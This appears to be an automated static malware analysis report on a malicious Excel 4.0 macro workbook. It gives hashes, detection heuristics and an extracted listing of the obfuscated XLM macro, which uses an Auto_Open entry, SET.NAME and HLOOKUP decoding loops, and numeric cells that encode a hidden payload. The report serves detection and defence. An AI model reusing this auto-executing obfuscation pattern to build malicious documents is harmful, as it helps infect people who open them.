Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4f28141d80a61692…

MALICIOUS

Office (OLE)

36.5 KB Created: 2020-11-27 11:45:45 Authoring application: Microsoft Excel First seen: 2021-01-11
MD5: 980cfcf720847a267a063523a3cbc056 SHA-1: 530bda2ba05a3b2b6b91fe71fc9b663fd3ea61c1 SHA-256: 4f28141d80a61692a93798b037d5d6a5808db8a1a361c862194d2d84c37ae822
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6693 bytes
SHA-256: a623a69eb47ce4249fd28d6492496b7a60875126c0da83a23db6065d2a87559f
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  cqGp
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C185 
' 0018     23 LABEL : Cell Value, String Constant - BhWcgSJh len=0 
' 0018     21 LABEL : Cell Value, String Constant - BxBMxg len=0 
' 0018     22 LABEL : Cell Value, String Constant - fBPeREi len=0 
' 0018     23 LABEL : Cell Value, String Constant - fcrEwXhW len=0 
' 0018     21 LABEL : Cell Value, String Constant - gaGVbY len=0 
' 0018     20 LABEL : Cell Value, String Constant - iDbyb len=0 
' 0018     22 LABEL : Cell Value, String Constant - iDkxPlO len=0 
' 0018     27 LABEL : Cell Value, String Constant - jwVZkWPSIgjM len=0 
' 0018     25 LABEL : Cell Value, String Constant - KRBSschGtV len=0 
' 0018     23 LABEL : Cell Value, String Constant - lOhOayac len=0 
' 0018     20 LABEL : Cell Value, String Constant - lsnyY len=0 
' 0018     25 LABEL : Cell Value, String Constant - nIxZGHhmSm len=0 
' 0018     21 LABEL : Cell Value, String Constant - oksrDf len=0 
' 0018     24 LABEL : Cell Value, String Constant - ORxmuNgQs len=0 
' 0018     26 LABEL : Cell Value, String Constant - QYewakSgZMy len=0 
' 0018     27 LABEL : Cell Value, String Constant - STARnbevUiWx len=0 
' 0018     25 LABEL : Cell Value, String Constant - TirrQToaTc len=0 
' 0018     20 LABEL : Cell Value, String Constant - TMKSt len=0 
' 0018     20 LABEL : Cell Value, String Constant - wPZzX len=0 
' 0018     23 LABEL : Cell Value, String Constant - yznknkAM len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  cqGp,P52,"",396.00000000000000000000
'  cqGp,P53,"",958.00000000000000000000
'  cqGp,P54,"",294.00000000000000000000
'  cqGp,P55,"",805.00000000000000000000
'  cqGp,P56,"",395.00000000000000000000
'  cqGp,P57,"",-749.00000000000000000000
'  cqGp,C89,"SET.NAME("yznknkAM",0+VALUE("0"))",""
'  cqGp,C91,"SET.NAME("STARnbevUiWx",yznknkAM)",""
'  cqGp,C93,"SET.NAME("QYewakSgZMy",yznknkAM)",""
'  cqGp,C95,"SET.NAME("gaGVbY",COUNTA(lOhOayac))",""
'  cqGp,C99,"SET.NAME("wPZzX",COUNTA(jwVZkWPSIgjM))",""
'  cqGp,C101,[],""
'  cqGp,C106,"SET.NAME("fBPeREi","")",""
'  cqGp,C111,"STARnbevUiWx",""
'  cqGp,C113,"SET.NAME("TMKSt",HLOOKUP("*",lOhOayac,STARnbevUiWx,FALSE))",""
'  cqGp,C116,"BhWcgSJh",""
'  cqGp,C121,"SET.NAME("BxBMxg",yznknkAM)",""
'  cqGp,C124,[],""
'  cqGp,C126,"BxBMxg",""
'  cqGp,C130,"iDbyb",""
'  cqGp,C133,"lsnyY",""
'  cqGp,C136,"iDkxPlO",""
'  cqGp,C140,"SET.NAME("TirrQToaTc",VALUE(HLOOKUP("*",jwVZkWPSIgjM,iDkxPlO,FALSE)))",""
'  cqGp,C145,"oksrDf",""
'  cqGp,C147,"fBPeREi",""
'  cqGp,C152,"QYewakSgZMy",""
'  cqGp,C156,NEXT(),""
'  cqGp,C161,"KRBSschGtV",""
'  cqGp,C166,[],""
'  cqGp,C171,"ORxmuNgQs",""
'  cqGp,C176,NEXT(),""
'  cqGp,C180,RETURN(),""
'  cqGp,C212,"SET.NAME("fcrEwXhW",C89)",""
'  cqGp,C214,"lOhOayac",""
'  cqGp,C216,"SET.NAME("jwVZkWPSIgjM",R50C14)",""
'  cqGp,C219,"SET.NAME("ORxmuNgQs",230)",""
'  cqGp,C224,"SET.NAME("nIxZGHhmSm",3)",""
'  cqGp,C229,fcrEwXhW(),""
'  cqGp,C230,HALT(),""